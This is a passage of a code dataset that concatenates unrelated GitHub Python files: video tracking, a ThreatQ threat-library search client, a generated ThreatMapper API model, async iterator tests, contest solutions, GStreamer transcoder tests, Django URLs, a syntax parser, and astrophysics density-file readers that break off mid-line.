cv2.LINE_AA,)\r\n print('x value:'+str(x_mean))\r\n cv2.putText(img,'x value:'+str((x_mean)) ,(500, 300), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n cv2.putText(img,'y value:'+str((y_mean)) ,(500, 350), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA,)\r\n\r\n \r\n \r\n cv2.imshow('frame',img)\r\n k = cv2.waitKey(30) & 0xff\r\n if k ==27:\r\n break\r\n \r\n old_gray = frame_gray.copy()\r\n p0 = good_new.reshape(-1,1,2)\r\n count +=1\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n cap = cv2.VideoCapture('./2021-10-26_14-00-14-front.mp4')\r\n feature_params,lk_params,color,old_gray,p0,mask = init_feature(cap)\r\n tracert_feature(cap,feature_params,lk_params,color,old_gray,p0,mask) \r\n cv2.destroyAllWindows()\r\n \r\n ","repo_name":"WilliamLin43/AITMA","sub_path":"vedio_detect.py","file_name":"vedio_detect.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11143182316","text":"import sys\nimport json\nimport requests\nimport logging\n\nfrom copy import copy, deepcopy\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nstring_types = (str,)\nif sys.version_info < (3,):\n string_types += (unicode,)\n\n\nclass ThreatLibrary(object):\n \"\"\"\n Executes a search using ThreatQ's Threat Library endpoints\n \"\"\"\n\n default_query = {\n \"name\": None,\n \"json\": {\n \"ui_query\": {\n \"columns\": {},\n \"criteria\": {},\n \"filters\": {},\n \"objects\": {\n \"current\": \"indicators\",\n \"selected\": []\n },\n \"filter_sets\": [\n {\n \"id\": 0,\n \"operator\": \"+or\",\n \"expanded\": True\n }\n ]\n },\n \"api_query\": {\n \"criteria\": {},\n \"filters\": {}\n }\n }\n }\n\n def __init__(self, tq, fields=None):\n \"\"\"\n Instantiates a ThreatLibrarySearch object\n\n Parameters:\n - tq (Threatq): A ThreatQ connection object\n - object_type (str): The object type you want to execute the query on\n - fields (list): List of fields to return from the Threat Library\n - load_objects (bool): Whether or not to dynamically load in objects, types, and statuses\n \"\"\"\n\n self.tq = tq\n self.saved_search = {}\n self.total = 0\n self.fields = fields or []\n self.date_injected = False\n\n # Object data\n self.object_list = []\n self.object_types = {}\n self.object_statuses = {}\n\n # Load object data from the ThreatQ instance\n self._load_object_list()\n\n def create_search_hash(self, mentions=None, json_data=None):\n \"\"\"\n DEPRECATED: This is only here for backwards compatible-ness\n\n Parameters:\n - mentions (str): Comma-separated list of values to search for keywords on\n - json_data (dict): The exact JSON data to be sent to the API to create a search\n \"\"\"\n\n return self.create_search(keywords=mentions, api_query=json_data)\n\n def create_search(self, name=None, keywords=None, api_query=None):\n \"\"\"\n Creates a Threat Library search\n\n Parameters:\n - name (str): A name for the search. If none provided, it will not be \"saved\" officially\n - keywords (list): A list of keywords to search for\n - api_query (dict): A pre-generated API query to use\n \"\"\"\n\n if not keywords and not api_query:\n raise ValueError('You must include either a \"keywords\" or \"api_query\" parameter')\n\n if isinstance(keywords, string_types):\n keywords = keywords.split(',')\n\n body = copy(self.default_query)\n body['name'] = name\n\n if keywords:\n # Build criteria\n ui_items = []\n api_items = []\n for item in keywords:\n api_items.append({\"mentions\": item.strip()})\n ui_items.append({\n 'key': 'mentions',\n 'value': item.strip(),\n 'set_id': 0\n })\n\n # Set UI query\n body['json']['ui_query']['criteria'] = {\n 'matchType': {'0': '+or'},\n 'items': ui_items\n }\n\n # Set API query\n body['json']['api_query']['criteria'] = {\"+or\": api_items}\n elif api_query:\n body['json']['api_query'] = api_query\n\n queries = self.tq.post('api/search/query', data=body)\n if queries and queries.get('data'):\n self.saved_search = queries['data']\n\n return self\n\n def get_saved_search(self, name):\n \"\"\"\n Gets the saved search data by name\n\n Parameters:\n - name (str): The name of the saved search to get\n \"\"\"\n\n queries = self.tq.get('api/search/query')\n if not queries or 'data' not in queries:\n raise ValueError('ThreatQ saved search query did not return any results')\n\n results = [x for x in queries['data'] if x['name'] == name]\n if not results:\n raise ValueError('No saved searches match the name provided')\n\n self.saved_search = results[0]\n\n # Load the search query from the response\n search = self.saved_search.get('json')\n if not search:\n raise ValueError(\"Search did not contain any criteria!\")\n\n # If the query is stringified, load it as a JSON object\n if isinstance(search, string_types):\n search = json.loads(search)\n\n # Set the query to the true JSON object\n self.saved_search['json'] = search\n return self\n\n def execute(self, object_type, custom_query={}, page_limit=1000,\n page_offset=0, max_results=None, yield_batches=False, fields=[]):\n \"\"\"\n Executes a query against the Threat Library and passes each batch to the caller to handle\n\n Parameters:\n - object_type (str): The object type within the ThreatQ system\n - query (dict): The query to execute. Will override the saved search\n - limit (int): The max amount of results per-page\n - max_result (int): The max amount of results to return (this is a hard stop)\n \"\"\"\n\n search = {}\n self.total = 0 # Reset the total count\n\n # Make sure a saved search exists or they're overriding it with a custom query\n if not custom_query and not self.saved_search:\n raise ValueError('You cannot execute a search without a JSON query')\n\n # Parse the JSON payload if using a saved search\n if custom_query:\n search = custom_query.get('api_query', custom_query)\n else:\n search = self.saved_search['json']\n\n # Match the passed object type to one from ThreatQ\n api_name = self._match_api_name(object_type)\n if not api_name:\n raise ValueError(\"Object type [{}] does not exist in ThreatQ!\".format(object_type))\n\n # Sanitize the payload by stripping out criteria\n # on objects that don't have certain properties\n payload = self.sanitize_payload(api_name, search)\n\n # If there is already an API query or manual query, use that\n if 'api_query' in payload or custom_query:\n payload = payload.get('api_query', payload)\n\n # Add in the fields\n payload['fields'] = fields or self.fields\n logger.debug('Executing [{}] Query: {}'.format(api_name, json.dumps(payload)))\n\n # paginate through results\n total = -1\n offset = page_offset\n while total == -1 or (offset < total and offset < max_results):\n params = {'limit': page_limit, 'offset': offset}\n res = {}\n\n try:\n res = self.tq.post('api/{}/query'.format(api_name), params=params, data=payload)\n except requests.exceptions.ConnectionError:\n logger.warning(\"BadStatusLine Error. Continuing...\")\n continue # Retry request\n\n if not res or 'data' not in res:\n raise ValueError('ThreatQ Threat Library Search for {} returned no data.'.format(api_name))\n\n # Store values for pagination\n offset += len(res['data'])\n\n # Set the total results\n self.total = res['total']\n\n # Handle \"first page\" stuff\n if total == -1:\n total = res['total']\n logger.debug('Threat Library search found {} total results'.format(total))\n max_results = total if not max_results else max_results\n\n ret = [item for item in res['data'] if item]\n if yield_batches:\n yield ret\n else:\n for i in ret:\n yield i\n\n def sanitize_payload(self, object_type, payload):\n \"\"\"\n Remove any unused payload filters, per-object type\n\n Parameters:\n - object_type (str): The object code for the payload\n - payload (dict): The search payload\n \"\"\"\n\n payload = deepcopy(payload)\n\n # Remove typename\n if object_type not in self.object_types.keys():\n Utils.strip_keys(payload, keys=['types', 'type_name'])\n else:\n # Make sure we are only querying for types that apply to the object\n values = Utils.get_key_values(payload, 'type_name')\n for val in values:\n if val not in self.object_types.get(object_type, []):\n Utils.strip_key_value(payload, 'type_name', val)\n\n # Remove status name\n if object_type not in self.object_statuses.keys():\n Utils.strip_keys(payload, keys=['statuses', 'status_name'])\n else:\n # Make sure we are only querying for types that apply to the object\n values = Utils.get_key_values(payload, 'status_name')\n for val in values:\n if val not in self.object_statuses.get(object_type):\n Utils.strip_key_value(payload, 'status_name', val)\n\n # Remove score\n if object_type not in ['indicators']:\n Utils.strip_keys(payload, keys=['score'])\n\n # Remove empty items\n rem = None\n while rem is None or rem != 0:\n rem = Utils.strip_empty(payload, ignore=['filters', 'criteria'])\n\n return payload\n\n def inject_date(self, start_date, end_date=\"NOW\", date_type='created_at'):\n \"\"\"\n Injects a date into the payload\n\n Parameters:\n - start_date (str): A string representation of a start date, or a laravel relative date\n - end_date (str): A string representation of an end date, or a laravel relative date\n - date_type (str): The date type to inject\n \"\"\"\n\n # Load the search JSON\n search_json = self.saved_search['json']\n\n # List of possible dates in search\n date_types = ['created_at', 'updated_at', 'touched_at']\n\n if 'api_query' not in search_json:\n raise ValueError(\"Cannot inject date into search without an API query\")\n\n # Detect the 'key' to inject into. Either criteria or filters. Default to criteria\n field = 'criteria'\n if search_json['api_query'].get('filters'):\n field = 'filters'\n\n # Copy the filters and make sure that it has an \"+and\" list\n filters = copy(search_json['api_query'][field])\n if not filters:\n filters = {}\n if '+and' not in filters:\n filters['+and'] = []\n\n # Remove other dates from the \"+and\" filter list\n for f in range(len(filters['+and'])):\n for k, v in filters['+and'][f].items():\n if k in date_types:\n del filters['+and'][f][k]\n\n # Inject new date\n filters['+and'].append({\n date_type: {\n \"+gt\": start_date,\n \"+lt\": end_date\n }\n })\n\n # Set the new JSON with injected date\n self.saved_search['json']['api_query'][field] = filters\n self.date_injected = True\n\n def _match_api_name(self, value):\n \"\"\"\n Matches an input to an API name\n \"\"\"\n\n if not self.object_list:\n raise ValueError(\"No ThreatQ object data loaded!\")\n\n c_val = Utils.standardize_value(value)\n\n for obj_data in self.object_list:\n if (\n Utils.standardize_value(obj_data['collection']) == c_val or\n Utils.standardize_value(obj_data['display_name']) == c_val or\n Utils.standardize_value(obj_data['display_name_plural']) == c_val\n ):\n return obj_data['collection']\n\n def _load_object_list(self):\n \"\"\"\n Loads in objects and types from ThreatQ\n \"\"\"\n\n # Get objects\n ignore = ['objectlinks', 'investigations']\n data = self.tq.get('/api/objects').get('data', [])\n if not data:\n raise ValueError(\"Failed to get objects from ThreatQ!\")\n\n # Get list of objects and filter out ones we want to ignore\n self.object_list = [val for val in data if val['collection'] not in ignore]\n\n # Fill out object data\n for obj in self.object_list:\n api_name = obj['collection']\n\n if 'types' in obj and len(obj['types']) > 0:\n if api_name not in self.object_types:\n self.object_types[api_name] = []\n for type_data in obj['types']:\n if type_data['name'] not in self.object_types[api_name]:\n self.object_types[api_name].append(type_data['name'])\n\n if 'statuses' in obj and len(obj['statuses']) > 0:\n if api_name not in self.object_statuses:\n self.object_statuses[api_name] = []\n for status_data in obj['statuses']:\n if status_data['name'] not in self.object_statuses[api_name]:\n self.object_statuses[api_name].append(status_data['name'])\n\n\nclass Utils:\n\n @staticmethod\n def strip_keys(input_data, keys=[], key_ends=[], skip=[]):\n \"\"\"\n Removes items from input\n \"\"\"\n\n if isinstance(input_data, dict):\n for key in list(input_data.keys()):\n if key in keys and key not in skip:\n del input_data[key]\n elif any(key.endswith(k) for k in key_ends) and key not in skip:\n del input_data[key]\n elif isinstance(input_data[key], list) or isinstance(input_data[key], dict):\n Utils.strip_keys(input_data[key], keys=keys, key_ends=key_ends, skip=skip)\n elif isinstance(input_data, list):\n for i in reversed(range(len(input_data))):\n Utils.strip_keys(input_data[i], keys=keys, key_ends=key_ends, skip=skip)\n else:\n pass\n\n @staticmethod\n def strip_empty(input_data, ignore=[]):\n \"\"\"\n Removes items from input\n \"\"\"\n\n total = 0\n\n if isinstance(input_data, dict):\n for key in list(input_data.keys()):\n if isinstance(input_data[key], list) or isinstance(input_data[key], dict):\n if key not in ignore and not input_data[key]:\n del input_data[key]\n total += 1\n else:\n total += Utils.strip_empty(input_data[key], ignore=ignore)\n elif isinstance(input_data, list):\n for i in reversed(range(len(input_data))):\n if not input_data[i]:\n del input_data[i]\n total += 1\n else:\n total += Utils.strip_empty(input_data[i], ignore=ignore)\n else:\n pass\n\n return total\n\n @staticmethod\n def get_key_values(input_data, key):\n \"\"\"\n Removes items from input\n \"\"\"\n\n values = []\n\n if isinstance(input_data, dict):\n for k in list(input_data.keys()):\n if isinstance(input_data[k], list) or isinstance(input_data[k], dict):\n values.extend(Utils.get_key_values(input_data[k], key))\n elif key == k:\n values.append(input_data[k])\n elif isinstance(input_data, list):\n for i in reversed(range(len(input_data))):\n values.extend(Utils.get_key_values(input_data[i], key))\n else:\n pass\n\n return values\n\n @staticmethod\n def strip_key_value(input_data, key, value):\n \"\"\"\n Removes items from input\n \"\"\"\n\n if isinstance(input_data, dict):\n for k in list(input_data.keys()):\n if isinstance(input_data[k], list) or isinstance(input_data[k], dict):\n Utils.strip_key_value(input_data[k], key, value)\n elif key == k and input_data[k] == value:\n del input_data[k]\n elif isinstance(input_data, list):\n for i in reversed(range(len(input_data))):\n Utils.strip_key_value(input_data[i], key, value)\n else:\n pass\n\n @staticmethod\n def standardize_value(value):\n \"\"\"\n Strips characters out of a string to standardize it\n \"\"\"\n\n if not value:\n return value\n\n value = value.replace('_', '')\n value = value.replace(' ', '')\n value = value.replace('-', '')\n value = value.strip()\n return value.lower()\n","repo_name":"netskopeoss/ta_cloud_exchange_plugins","sub_path":"tq_mw_netskope/lib/threatqsdk/threat_library.py","file_name":"threat_library.py","file_ext":"py","file_size_in_byte":16789,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"3564443566","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nfrom attrs import define as _attrs_define\nfrom attrs import field as _attrs_field\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.model_cloud_node_account_register_resp_data import ModelCloudNodeAccountRegisterRespData\n\n\nT = TypeVar(\"T\", bound=\"ModelCloudNodeAccountRegisterResp\")\n\n\n@_attrs_define\nclass ModelCloudNodeAccountRegisterResp:\n \"\"\"\n Example:\n {'data': {'cloudtrail_trails': [{'account_id': 'account_id', 'trail_name': 'trail_name'}, {'account_id':\n 'account_id', 'trail_name': 'trail_name'}], 'log_action': {'id': 0, 'request_payload': 'request_payload'},\n 'scans': {'key': {'account_id': 'account_id', 'stop_requested': True, 'benchmarks': [{'controls': ['controls',\n 'controls'], 'compliance_type': 'compliance_type', 'id': 'id'}, {'controls': ['controls', 'controls'],\n 'compliance_type': 'compliance_type', 'id': 'id'}], 'scan_id': 'scan_id', 'scan_types': ['scan_types',\n 'scan_types']}}, 'refresh': 'refresh'}}\n\n Attributes:\n data (Union[Unset, ModelCloudNodeAccountRegisterRespData]): Example: {'cloudtrail_trails': [{'account_id':\n 'account_id', 'trail_name': 'trail_name'}, {'account_id': 'account_id', 'trail_name': 'trail_name'}],\n 'log_action': {'id': 0, 'request_payload': 'request_payload'}, 'scans': {'key': {'account_id': 'account_id',\n 'stop_requested': True, 'benchmarks': [{'controls': ['controls', 'controls'], 'compliance_type':\n 'compliance_type', 'id': 'id'}, {'controls': ['controls', 'controls'], 'compliance_type': 'compliance_type',\n 'id': 'id'}], 'scan_id': 'scan_id', 'scan_types': ['scan_types', 'scan_types']}}, 'refresh': 'refresh'}.\n \"\"\"\n\n data: Union[Unset, \"ModelCloudNodeAccountRegisterRespData\"] = UNSET\n additional_properties: Dict[str, Any] = _attrs_field(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n data: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.data, Unset):\n data = self.data.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if data is not UNSET:\n field_dict[\"data\"] = data\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.model_cloud_node_account_register_resp_data import ModelCloudNodeAccountRegisterRespData\n\n d = src_dict.copy()\n _data = d.pop(\"data\", UNSET)\n data: Union[Unset, ModelCloudNodeAccountRegisterRespData]\n if isinstance(_data, Unset):\n data = UNSET\n else:\n data = ModelCloudNodeAccountRegisterRespData.from_dict(_data)\n\n model_cloud_node_account_register_resp = cls(\n data=data,\n )\n\n model_cloud_node_account_register_resp.additional_properties = d\n return model_cloud_node_account_register_resp\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"deepfence/threatmapper-python-client","sub_path":"threatmapper/models/model_cloud_node_account_register_resp.py","file_name":"model_cloud_node_account_register_resp.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"15483349235","text":"import unittest\n\n\nfrom aiter import iter_to_aiter, join_aiters, push_aiter\n\n\nfrom .helpers import run, get_n\n\n\nclass test_aitertools(unittest.TestCase):\n\n def test_join_aiters(self):\n int_vals = [1, 2, 3, 4]\n str_vals = \"abcdefg\"\n\n list_of_lists = [int_vals, str_vals]\n iter_of_aiters = [iter_to_aiter(_) for _ in list_of_lists]\n aiter_of_aiters = iter_to_aiter(iter_of_aiters)\n r = run(get_n(join_aiters(aiter_of_aiters)))\n\n r1 = [_ for _ in r if isinstance(_, int)]\n r2 = [_ for _ in r if isinstance(_, str)]\n self.assertEqual(r1, int_vals)\n self.assertEqual(r2, list(str_vals))\n\n def test_join_aiters_1(self):\n # make sure nothing's dropped\n # even if lots of events come in at once\n main_aiter = push_aiter()\n child_aiters = []\n aiter = join_aiters(main_aiter)\n\n child_aiters.append(push_aiter())\n child_aiters[0].push(100)\n main_aiter.push(child_aiters[0])\n\n t = run(get_n(aiter, 1))\n self.assertEqual(t, [100])\n\n child_aiters.append(push_aiter())\n child_aiters[0].push(101)\n child_aiters[1].push(200)\n child_aiters[1].push(201)\n main_aiter.push(child_aiters[1])\n\n t = run(get_n(aiter, 3))\n self.assertEqual(set(t), set([101, 200, 201]))\n\n for _ in range(3):\n child_aiters.append(push_aiter())\n main_aiter.push(child_aiters[-1])\n for _, ca in enumerate(child_aiters):\n ca.push((_+1) * 100)\n ca.push((_+1) * 100 + 1)\n\n t = run(get_n(aiter, len(child_aiters) * 2))\n self.assertEqual(set(t), set([100, 101, 200, 201, 300, 301, 400, 401, 500, 501]))\n\n child_aiters[-1].push(5000)\n main_aiter.stop()\n t = run(get_n(aiter, 1))\n self.assertEqual(t, [5000])\n\n for ca in child_aiters:\n ca.push(99)\n ca.stop()\n t = run(get_n(aiter))\n self.assertEqual(t, [99] * len(child_aiters))\n","repo_name":"richardkiss/aiter","sub_path":"tests/test_join_aiters.py","file_name":"test_join_aiters.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"21730530053","text":"#1613_플로이드워셜(골드3)\n#pypy3로 제출\n#플로이드워셜 a->b b->c : a->c\n\nimport sys\ninput = sys.stdin.readline\n\nn, k = map(int, input().split()) #사건개수n\ngraph = [[0] * n for _ in range(n)]\nseek = []\n\nfor _ in range(k):\n a, b = map(int, input().split()) #a가 b보다 먼저\n graph[a-1][b-1] = 1\n\ns = int(input()) #구할 관계\nfor _ in range(s):\n a, b = map(int, input().split())\n seek.append([a-1, b-1])\n\n#경유, 출발, 도착\nfor j in range(n):\n for i in range(n):\n for k in range(n):\n if graph[i][j] and graph[j][k]:\n graph[i][k] = 1\n\nfor a, b in seek:\n if graph[a][b]:\n print(-1)\n elif graph[b][a]:\n print(1)\n else:\n print(0)","repo_name":"hanjaegyeong/algorithm","sub_path":"baekjoon/1613_플로이드워셜(골드3).py","file_name":"1613_플로이드워셜(골드3).py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73286894390","text":"import os\nimport slash\n\nfrom ....lib import platform\nfrom ....lib.common import get_media\nfrom ....lib.gstreamer.transcoderbase import BaseTranscoderTest\nfrom ....lib.gstreamer.util import have_gst_element\n\n@slash.requires(*have_gst_element(\"vaapi\"))\nclass TranscoderTest(BaseTranscoderTest):\n requirements = dict(\n decode = {\n \"avc\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"openh264dec\"), \"h264parse ! openh264dec ! videoconvert\"),\n hw = (platform.get_caps(\"decode\", \"avc\"), have_gst_element(\"vaapih264dec\"), \"h264parse ! vaapih264dec\"),\n ),\n \"hevc-8\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"libde265dec\"), \"h265parse ! libde265dec ! videoconvert\"),\n hw = (platform.get_caps(\"decode\", \"hevc_8\"), have_gst_element(\"vaapih265dec\"), \"h265parse ! vaapih265dec\"),\n ),\n \"mpeg2\" : dict(\n sw = (dict(maxres = (2048, 2048)), have_gst_element(\"mpeg2dec\"), \"mpegvideoparse ! mpeg2dec ! videoconvert\"),\n hw = (platform.get_caps(\"decode\", \"mpeg2\"), have_gst_element(\"vaapimpeg2dec\"), \"mpegvideoparse ! vaapimpeg2dec\"),\n ),\n \"mjpeg\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"jpegdec\"), \"jpegparse ! jpegdec\"),\n hw = (platform.get_caps(\"decode\", \"jpeg\"), have_gst_element(\"vaapijpegdec\"), \"jpegparse ! vaapijpegdec\"),\n ),\n \"vc1\" : dict(\n sw = (\n dict(maxres = (16384, 16384)), have_gst_element(\"avdec_vc1\"),\n \"'video/x-wmv,profile=(string)advanced'\"\n \",width={width},height={height},framerate=14/1 ! avdec_vc1\"\n ),\n hw = (\n platform.get_caps(\"decode\", \"vc1\"), have_gst_element(\"vaapivc1dec\"),\n \"'video/x-wmv,profile=(string)advanced'\"\n \",width={width},height={height},framerate=14/1 ! vaapivc1dec\"\n ),\n ),\n },\n encode = {\n \"avc\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"x264enc\"), \"x264enc ! video/x-h264,profile=main ! h264parse\"),\n hw = (platform.get_caps(\"encode\", \"avc\"), have_gst_element(\"vaapih264enc\"), \"vaapih264enc ! video/x-h264,profile=main ! h264parse\"),\n lp = (platform.get_caps(\"vdenc\", \"avc\"), have_gst_element(\"vaapih264enc\"), \"vaapih264enc rate-control=cqp tune=low-power ! video/x-h264,profile=main ! h264parse\"),\n ),\n \"hevc-8\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"x265enc\"), \"videoconvert chroma-mode=none dither=0 ! video/x-raw,format=I420 ! x265enc ! video/x-h265,profile=main ! h265parse\"),\n hw = (platform.get_caps(\"encode\", \"hevc_8\"), have_gst_element(\"vaapih265enc\"), \"vaapih265enc ! video/x-h265,profile=main ! h265parse\"),\n lp = (platform.get_caps(\"vdenc\", \"hevc_8\"), have_gst_element(\"vaapih265enc\"), \"vaapih265enc tune=low-power ! video/x-h265,profile=main ! h265parse\"),\n ),\n \"mpeg2\" : dict(\n sw = (dict(maxres = (2048, 2048)), have_gst_element(\"avenc_mpeg2video\"), \"avenc_mpeg2video ! mpegvideoparse\"),\n hw = (platform.get_caps(\"encode\", \"mpeg2\"), have_gst_element(\"vaapimpeg2enc\"), \"vaapimpeg2enc ! mpegvideoparse\"),\n ),\n \"mjpeg\" : dict(\n sw = (dict(maxres = (16384, 16384)), have_gst_element(\"jpegenc\"), \"jpegenc ! jpegparse\"),\n hw = (platform.get_caps(\"vdenc\", \"jpeg\"), have_gst_element(\"vaapijpegenc\"), \"vaapijpegenc ! jpegparse\"),\n ),\n },\n vpp = {\n \"scale\" : dict(\n sw = (True, have_gst_element(\"videoscale\"), \"videoscale ! video/x-raw,width={width},height={height}\"),\n hw = (platform.get_caps(\"vpp\", \"scale\"), have_gst_element(\"vaapipostproc\"), \"vaapipostproc ! video/x-raw,width={width},height={height}\"),\n lp = (platform.get_caps(\"vpp\", \"scale\"), have_gst_element(\"vaapipostproc\"), \"vaapipostproc ! video/x-raw,width={width},height={height}\"),\n ),\n },\n )\n\n # hevc implies hevc 8 bit\n requirements[\"encode\"][\"hevc\"] = requirements[\"encode\"][\"hevc-8\"]\n requirements[\"decode\"][\"hevc\"] = requirements[\"decode\"][\"hevc-8\"]\n\n def before(self):\n super().before()\n os.environ[\"GST_VAAPI_DRM_DEVICE\"] = get_media().render_device\n","repo_name":"intel/vaapi-fits","sub_path":"lib/gstreamer/vaapi/transcoder.py","file_name":"transcoder.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"94"} +{"seq_id":"5218833868","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport os\n\nfrom nltk.data import find\nfrom bllipparser import RerankingParser\n\nfrom nltk.tree import Tree\nfrom nltk import data\n\n\n#import spacy\n#from stanfordcorenlp import StanfordCoreNLP\n#import logging\n#from nltk.parse import CoreNLPParser\n#from pycorenlp import StanfordCoreNLP\n\n#Other interesting tree parser pt & en: https://github.com/Lynten/stanford-corenlp\n\nclass Sintaxe:\n\n def __init__(self, lang='pt-pt'):\n if lang=='pt-pt' or lang=='por':\n self.lang = 'pt'\n else:\n self.lang = 'en'\n \n self.lang = lang\n\n #self.text = ''\n self.parser = self.load_parser()\n self.tree = None\n\n def generate(self, text):\n parsed = self.parse(text)\n tree = Tree.fromstring(parsed)\n self.tree = tree\n return tree\n\n def parse(self, text):\n return self.parser.simple_parse(text)\n\n def load_parser(self):\n nltk_data = os.path.join('data', 'nltk_data')\n model = os.path.join(nltk_data, 'models', 'bllip_wsj_no_aux')\n return RerankingParser.from_unified_model_dir(model)\n\n def draw(self, tree=None):\n if tree:\n tree.draw()\n else:\n self.tree.draw()\n\n\n def printTree(self, tree=None):\n if tree:\n tree.pretty_print()\n else:\n self.tree.pretty_print()\n\nif __name__ == '__main__':\n main = Sintaxe('I am testing this new system.', lang='en')\n print(repr(main.tree))\n #main.printTree()\n #main.draw()\n","repo_name":"Paulo-Jorge-PM/text-ide-kivy","sub_path":"app/core/sintaxe.py","file_name":"sintaxe.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"16197772891","text":"import io\nimport sys\n\n# input here\n_INPUT = \"\"\"\\\n62\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n\n\nimport sys\n\nS = input()\n\nif len(S) == 1:\n if int(S) % 8 == 0:\n print('Yes')\n else:\n print('No')\nelif len(S) == 2:\n if int(S) % 8 == 0 or int(S[1] + S[0]) % 8 == 0:\n print('Yes')\n else:\n print('No')\nelse:\n eights = []\n for i in range(1000):\n if i % 8 == 0:\n t = []\n for j in range(3):\n t.append(i % 10)\n i //= 10\n eights.append(t)\n l = [0] * 10\n for i in range(len(S)):\n l[int(S[i])] += 1\n for i in range(len(eights)):\n l2 = [0] * 10\n for j in range(3):\n l2[eights[i][j]] += 1\n flag = True\n for j in range(10):\n if l[j] < l2[j]:\n flag = False\n if flag:\n print('Yes')\n sys.exit()\n\n print('No')\n","repo_name":"n-nooobu/atcoder","sub_path":"abc181/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1551244880","text":"from knock41 import get_chunk_list\n\nfor line in get_chunk_list():\n for chunk in line:\n if chunk.check_pos('動詞'):\n predicate = chunk.get_surfaces('pos', '動詞')[0]\n \n avs = []\n for src in chunk.srcs:\n if len(line[src].get_surfaces('pos', '助詞')) > 0:\n avs.append(line[src].get_surfaces('pos', '助詞').pop())\n \n if avs:\n avs = ' '.join(sorted(avs))\n print(f'{predicate}\\t{avs}')\n \n\n# sort result45 | uniq -c | sort -n -r > result45_unix\n# grep \"^する\" result45 | sort | uniq -c | sort -n -r > する\n# grep \"^見る\" result45 | sort | uniq -c | sort -n -r > 見る\n# grep \"^与える\" result45 | sort | uniq -c | sort -n -r > 与える\n","repo_name":"kokeman/NLP100knock","sub_path":"chapter05/knock45.py","file_name":"knock45.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73952725748","text":"from __future__ import unicode_literals\n\nfrom django.conf.urls import url\n\nfrom . import views\n\napp_name = 'blog'\n\nurlpatterns = [\n url(r'^$', views.articles, name='articles'),\n url(r'^tag/(?P[a-zа-я]+)/$', views.tag_sort, name='tag'),\n url(r'^author/(?P\\w+)/$', views.author_articles, name='author_articles'),\n url(r'^create/$', views.create_article, name='create_article'),\n url(r'^edit/(?P\\w+)/$', views.EditArticle.as_view(), name='edit_article'),\n url(r'^delete/(?P\\w+)/$', views.delete_article,\n name='delete_article'),\n url(r'^(?P\\w+)/$', views.article, name='article')\n]\n","repo_name":"DudkinON/web-zoomer","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5147578376","text":"#reading different model files\n\nimport warnings\nimport numpy as np\nfrom numpy import recfromtxt, genfromtxt\nimport pandas as pd\nfrom astropy import units as u\nfrom pyne import nucname\n\nimport logging\n# Adding logging support\nlogger = logging.getLogger(__name__)\n\nfrom tardis.util.base import parse_quantity\n\n\nclass ConfigurationError(Exception):\n pass\n\n\ndef read_density_file(filename, filetype):\n \"\"\"\n read different density file formats\n\n Parameters\n ----------\n\n filename: ~str\n filename or path of the density file\n\n filetype: ~str\n type of the density file\n\n Returns\n -------\n time_of_model: ~astropy.units.Quantity\n time at which the model is valid\n\n velocity: ~np.ndarray\n the array containing the velocities\n\n unscaled_mean_densities: ~np.ndarray\n the array containing the densities\n\n \"\"\"\n file_parsers = {'artis': read_artis_density,\n 'simple_ascii': read_simple_ascii_density,\n 'cmfgen_model': read_cmfgen_density}\n\n electron_densities = None\n temperature = None\n if filetype == 'cmfgen_model':\n (time_of_model, velocity,\n unscaled_mean_densities, electron_densities, temperature) = read_cmfgen_density(filename)\n else:\n (time_of_model, velocity,\n unscaled_mean_densities) = file_parsers[filetype](filename)\n\n v_inner = velocity[:-1]\n v_outer = velocity[1:]\n\n invalid_volume_mask = (v_outer - 